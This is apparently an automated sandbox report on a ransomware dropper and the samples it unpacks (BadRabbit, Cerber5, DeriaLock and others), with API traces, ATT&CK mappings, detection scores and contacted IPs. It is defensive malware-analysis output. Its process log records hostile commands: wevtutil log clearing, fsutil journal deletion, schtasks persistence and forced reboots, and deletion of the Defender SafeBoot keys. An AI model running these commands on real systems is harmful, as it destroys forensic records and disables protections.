      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,40_2_00401423
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,3_2_007B9016
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00404FE6 mov eax, dword ptr fs:[00000030h]19_2_00404FE6
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00404FE6 mov eax, dword ptr fs:[00000030h]40_2_00404FE6
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF25540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00007FF7CEF25540
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_01321690 GetProcessHeap,1_2_01321690
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
      Source: C:\Windows\5753.tmpProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\irH9zMhZub.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exeCode function: 1_2_01321499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,1_2_01321499
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF271F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FF7CEF271F0
      Source: C:\Windows\5753.tmpCode function: 27_2_00007FF7CEF257FC SetUnhandledExceptionFilter,27_2_00007FF7CEF257FC

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.50.106.206 445Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe" Jump to behavior
      Source: C:\Users\user\Desktop\irH9zMhZub.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,3_2_007B841D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_007B6FFE
      Source: C:\Users\user\Desktop\irH9zMhZub.exeQueries volume information: C:\Users\user\Desktop\irH9zMhZub.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
      Source: C:\Users\user\Desktop\irH9zMhZub.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,3_2_007B9534
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B57E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,3_2_007B57E5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_007B6FFE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B1531 GetVersion,3_2_007B1531

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WinDefend
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : select * from AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : select * from AntiVirusProduct
      Source: Endermanch@Krotten.exe.0.dr Binary or memory string: C:\WINDOWS\Cursors\avp.exe
      Source: Endermanch@Krotten.exe.0.dr Binary or memory string: Photo.exeC:\WINDOWS\Cursors\avp.exe
      Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: es%\Windows Defender\MsMpeng.exe
      Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

      Stealing of Sensitive Information

      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED
      Source: Yara match File source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPE
      Source: Yara match File source: 27.0.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 27.2.5753.tmp.7ff7cef20000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 27.0.5753.tmp.7ff7cef20000.1.unpack, type: UNPACKEDPE

      Remote Access Functionality

      Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Fantom.exe, type: DROPPED

      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | 1 Valid Accounts | 111 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 411 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | 1 Replication Through Removable Media | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
      | 1 Replication Through Removable Media | 14 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Screen Capture | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 1 System Shutdown/Reboot |
      | Domain Accounts | 1 Scheduled Task/Job | 12 Windows Service | 11 Access Token Manipulation | 31 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | 2 Inhibit System Recovery |
      | Local Accounts | 12 Service Execution | 1 Scheduled Task/Job | 12 Windows Service | 241 Software Packing | NTDS | 28 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | 1 Defacement |
      | Cloud Accounts | Cron | 121 Registry Run Keys / Startup Folder | 112 Process Injection | 1 DLL Side-Loading | LSA Secrets | 2 Network Share Discovery | SSH | Keylogging | Data Transfer Size Limits | 3 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
      | Replication Through Removable Media | Launchd | Rc.common | 1 Scheduled Task/Job | 1 File Deletion | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | 1 Proxy | Jamming or Denial of Service | | Abuse Accessibility Features |
      | External Remote Services | Scheduled Task | Startup Items | 121 Registry Run Keys / Startup Folder | 121 Masquerading | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 2 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
      | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 21 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 11 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
      | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 11 Access Token Manipulation | Network Sniffing | 1 System Network Configuration Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
      | Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 112 Process Injection | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |
      | Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | 1 Rundll32 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery |
      | Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | 2 Indicator Removal on Host | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement |

      [Behavior graph: ID 712619, Sample: irH9zMhZub.exe, Start date: 29/09/2022, Architecture: WINDOWS, Score: 100]

      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | irH9zMhZub.exe | 67% | ReversingLabs | Win32.Ransomware.Cerber |
      | irH9zMhZub.exe | 64% | Virustotal | |
      | irH9zMhZub.exe | 27% | Metadefender | |
      | irH9zMhZub.exe | 100% | Avira | TR/Dropper.Gen |
      | irH9zMhZub.exe | 100% | Joe Sandbox ML | |

      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe | 100% | Avira | TR/Sirery.A |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe | 100% | Avira | HEUR/AGEN.1227089 |
      | C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | 100% | Avira | TR/Ransom.pfnaw |
      | C:\Windows\dispci.exe | 100% | Avira | TR/Diskcoder.12354 |
      | C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe | 100% | Avira | HEUR/AGEN.1240493 |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe | 100% | Avira | TR/BAS.Samca.fyzpg |
      | C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe | 100% | Avira | TR/Genasom.wzara |
      | C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | 100% | Avira | TR/Diskcoder.ezxim |
      | C:\Users\user\AppData\Local\Temp\Fantom.exe | 100% | Avira | TR/AD.HiddenTear.huakh |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | 100% | Joe Sandbox ML | |
      | C:\Windows\dispci.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Fantom.exe | 100% | Joe Sandbox ML | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | 93% | ReversingLabs | Win32.Ransomware.BadRabbit |
      | C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe | 83% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe | 86% | ReversingLabs | Win32.Ransomware.Genasom |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe | 78% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe | 91% | ReversingLabs | Win32.Ransomware.Cerber |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe | 76% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe | 92% | ReversingLabs | Win32.Ransomware.Derialock |
      | C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe | 69% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | 85% | ReversingLabs | ByteCode-MSIL.Ransomware.Infinity |
      | C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe | 60% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe | 96% | ReversingLabs | Win32.Trojan.Krotten |
      | C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe | 86% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe | 91% | ReversingLabs | Win32.Ransomware.Troldesh |
      | C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe | 72% | Metadefender | |
      | C:\Users\user\AppData\Local\Temp\Fantom.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Fantom |
      | C:\Users\user\AppData\Local\Temp\Fantom.exe | 66% | Metadefender | |
      | C:\Windows\cscc.dat | 4% | ReversingLabs | |
      | C:\Windows\cscc.dat | 0% | Metadefender | |
      | C:\Windows\dispci.exe | 96% | ReversingLabs | Win32.Ransomware.BadRabbit |
      | C:\Windows\dispci.exe | 86% | Metadefender | |

      | Source | Detection | Scanner | Label |
      |---|---|---|---|
      | raw.githubusercontent.com | 2% | Virustotal | |

      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
      |---|---|---|---|---|---|
      | github.com | 140.82.121.4 | true | false | | high |
      | raw.githubusercontent.com | 185.199.108.133 | true | false | | unknown |

      Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                              9121TTNETTRfalse
                                                                                                              87.98.177.235
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              95.1.200.4
                                                                                                              unknownTurkey
                                                                                                              9121TTNETTRfalse
                                                                                                              87.98.177.234
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              95.1.200.9
                                                                                                              unknownTurkey
                                                                                                              9121TTNETTRfalse
                                                                                                              95.1.200.7
                                                                                                              unknownTurkey
                                                                                                              9121TTNETTRfalse
                                                                                                              87.98.177.231
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              95.1.200.8
                                                                                                              unknownTurkey
                                                                                                              9121TTNETTRfalse
                                                                                                              87.98.177.230
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.249
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.248
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.247
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.246
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.97
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.96
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.99
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.98
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.241
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.93
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.240
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.92
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.95
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.94
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.245
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.244
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.243
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.91
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.242
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.179.90
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.229
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.226
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.225
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.228
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.227
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.222
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.221
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.224
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.223
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.177.220
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.252
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.251
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.250
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.255
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.254
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              87.98.178.253
                                                                                                              unknownFrance
                                                                                                              16276OVHFRfalse
                                                                                                              93.107.12.20
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.21
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.22
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.23
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.24
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.25
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.26
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.27
                                                                                                              unknownIreland
                                                                                                              15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                              93.107.12.28
                                                                                                              unknownIreland
